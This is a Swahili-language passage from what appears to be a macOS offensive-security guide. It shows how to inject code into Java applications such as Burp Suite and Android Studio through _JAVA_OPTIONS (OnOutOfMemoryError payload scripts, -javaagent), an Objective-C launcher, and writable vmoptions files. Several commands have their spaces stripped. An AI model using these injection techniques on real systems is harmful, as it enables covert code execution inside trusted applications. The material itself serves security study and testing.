Tafuta programu za Java zilizosakinishwa kwenye mfumo wako. Ili kugundua programu za Java katika Info.plist, unaweza kutafuta vigezo vya java ambavyo vinajumuisha herufi java., hivyo unaweza kutafuta kwa kutumia hilo:
# Search only in /Applications foldersudofind/Applications-name'Info.plist'-execgrep-l"java\."{} \; 2>/dev/null# Full searchsudofind/-name'Info.plist'-execgrep-l"java\."{} \; 2>/dev/null
_JAVA_OPTIONS
Variable ya mazingira _JAVA_OPTIONS inaweza kutumika kuwezesha vigezo vya Java visivyo na kikomo katika utekelezaji wa programu iliyoundwa kwa kutumia Java:
# Write your payload in a script called /tmp/payload.shexport _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
Ili kuendesha kama mchakato mpya na sio kama mtoto wa terminal ya sasa, unaweza kutumia:
#import <Foundation/Foundation.h>
// clang -fobjc-arc -framework Foundation invoker.m -o invoker
int main(int argc, const char * argv[]) {
@autoreleasepool {
// Specify the file path and content
NSString *filePath = @"/tmp/payload.sh";
NSString *content = @"#!/bin/bash\n/Applications/iTerm.app/Contents/MacOS/iTerm2";
NSError *error = nil;
// Write content to the file
BOOL success = [content writeToFile:filePath
atomically:YES
encoding:NSUTF8StringEncoding
error:&error];
if (!success) {
NSLog(@"Error writing file at %@\n%@", filePath, [error localizedDescription]);
return 1;
}
NSLog(@"File written successfully to %@", filePath);
// Create a new task
NSTask *task = [[NSTask alloc] init];
/// Set the task's launch path to use the 'open' command
[task setLaunchPath:@"/usr/bin/open"];
// Arguments for the 'open' command, specifying the path to Android Studio
[task setArguments:@[@"/Applications/Android Studio.app"]];
// Define custom environment variables
NSDictionary *customEnvironment = @{
@"_JAVA_OPTIONS": @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh"
};
// Get the current environment and merge it with custom variables
NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];
[environment addEntriesFromDictionary:customEnvironment];
// Set the task's environment
[task setEnvironment:environment];
// Launch the task
[task launch];
}
return 0;
}
Hata hivyo, hii itasababisha kosa kwenye programu inayotekelezwa, njia nyingine ya siri zaidi ni kuunda wakala wa Java na kutumia:
export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"# Oropen--env"_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'"-a"Burp Suite Professional"
Kuunda wakala na toleo tofauti la Java kutoka kwa programu inaweza kusababisha kushindwa kwa utekelezaji wa wakala na programu
Na kisha weka mazingira ya kipekee na endesha programu ya Java kama ifuatavyo:
export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"# Oropen--env"_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'"-a"Burp Suite Professional"
Faili la vmoptions
Faili hili linasaidia ufafanuzi wa params za Java wakati Java inatekelezwa. Unaweza kutumia mbinu zilizotangulia kubadilisha params za java na kufanya mchakato utekeleze amri za kiholela.
Zaidi ya hayo, faili hili pia linaweza kuhusisha faili zingine na kwa kutumia include directory, hivyo unaweza pia kubadilisha faili iliyohusishwa.
Zaidi ya hayo, baadhi ya programu za Java zitapakia zaidi ya faili moja ya vmoptions.
Baadhi ya programu kama Android Studio inaonyesha katika matokeo yake wapi wanatafuta faili hizi, kama:
Ikiwa hawana, unaweza kuchunguza kwa urahisi kwa kutumia:
# Monitorsudoesloggerlookup|grepvmoption# Give FDA to the Terminal# Launch the Java app/Applications/Android\Studio.app/Contents/MacOS/studio
Tazama jinsi ilivyo ya kuvutia kwamba Android Studio katika mfano huu inajaribu kupakia faili /Applications/Android Studio.app.vmoptions, mahali ambapo mtumiaji yeyote kutoka kwenye kikundi cha admin ana ufikiaji wa kuandika.
